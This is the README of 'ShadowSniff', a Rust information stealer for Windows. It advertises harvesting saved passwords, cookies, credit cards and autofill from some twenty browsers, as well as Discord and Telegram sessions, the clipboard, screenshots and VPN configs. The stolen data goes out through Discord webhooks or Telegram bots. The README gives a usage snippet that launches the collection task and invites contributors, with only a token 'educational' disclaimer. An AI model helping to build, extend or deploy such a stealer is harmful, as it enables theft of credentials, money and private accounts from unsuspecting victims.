Lightweight information stealer written in Rust, targeting Windows systems. It interacts directly with the Windows API and avoids unnecessary external dependencies, resulting in a compact, efficient, and low-footprint binary. (PoC. For Educational Purposes only)
Made in Russia.
This project is currently under development, and a fully functional version has not been released yet. Features and stability may change. Please consider enabling notifications to stay informed about updates and important announcements.
Despite its lightweight design, ShadowSniff delivers extensive functionality, covering all essential data extraction capabilities for Windows targets.
- Discord webhook
- Telegram bot
| Feature | Chromium (<127, see here) | Gecko |
|---|---|---|
| Supported | Amingo, Torch, Kometa, Orbitum, Epic Private, Cent, Vivaldi, Chromium, Thorium, Opera, Opera GX, 7Star, Chrome SxS, Chrome, Edge, Uran, Yandex, Brave, Atom | Firefox, Librewolf |
| AutoFill | ✅ | ❌ |
| Bookmarks | ✅ | ❌ |
| Cookies | ✅ | ✅ |
| Passwords | ✅ | ❌ |
| Credit cards | ✅ | ❌ |
| Downloads | ✅ | ❌ |
| History | ✅ | ✅ |
- Discord
- Telegram sessions
- Process list
- Clipboard
- Screenshot
- System info
- User info
- OpenVPN
... more
If you'd like the stealer to support additional features, feel free to open an issue here to request the functionality — or implement it yourself.
Feel free to open issues or submit pull requests — all contributions are welcome, whether it's a bug fix, a new feature, or just an idea.
⭐ You can also support the project by starring the repository — it's a small action that makes a big difference!
Thanks for being part of the project ❤️
This stealer is task-based.
Each task can spawn subtasks, but the main task is `shadowsniff::SniffTask`, which is responsible for collecting the entire log.
There are also composite tasks that contain other tasks. When started, each task runs in its own thread. A composite task waits for all its subtasks to finish before it completes.
The stealer does not use the Rust standard library.
The `utils::path::Path` type used in `run` comes from the crate `utils`.
Before calling `SniffTask::new().run(&base_path)`, you must call `ipinfo::init_ip_info()`, otherwise it won't work.
```rust
use utils::path::Path;
use ipinfo::init_ip_info;
use shadowsniff::SniffTask;

fn main() {
    if !init_ip_info() {
        panic!("Failed to initialize IP info");
    }

    let base_path = Path::new("output");
    unsafe {
        SniffTask::new().run(&base_path);
    }
}
```
This project has been inspired by a variety of open-source infostealers available on GitHub. Many functions and critical paths were adapted from publicly available repositories. The goal was to build something original by learning from and evolving existing work. I’d like to thank everyone whose contributions helped shape this project — with special appreciation to:
- davimiku — for a clean and efficient JSON parser implementation
- CasualX — for compile-time string obfuscation
...and many others whose code, ideas, or techniques helped shape this project — even if only through a single clever line of Rust.
This library is released under the MIT License. See LICENSE file for more information.
This software, known as ShadowSniff, is intended solely for educational and research purposes. It must never be used for malicious purposes, including (but not limited to) unauthorized access, data breaches, or any other harmful or illegal activities.
By using this tool, you accept full responsibility for your actions. Any form of misuse is strictly forbidden. The creator (sqlerrorthing) bears no liability for how the tool is used. It is your sole duty to ensure that your usage complies with all relevant laws and regulations in your area.
The creator (sqlerrorthing) of this tool assumes no responsibility for any damage or legal consequences that may result from its use or misuse. This includes, but is not limited to, any direct, indirect, incidental, consequential, or punitive damages arising from your access to, use of, or inability to use the software.
The creator (sqlerrorthing) will not offer any support, guidance, or assistance in cases involving misuse of this tool. Any inquiries related to malicious or unauthorized activities will be disregarded.
By using this tool, you acknowledge and accept the terms of this disclaimer. If you do not agree with these terms, you must refrain from using the software.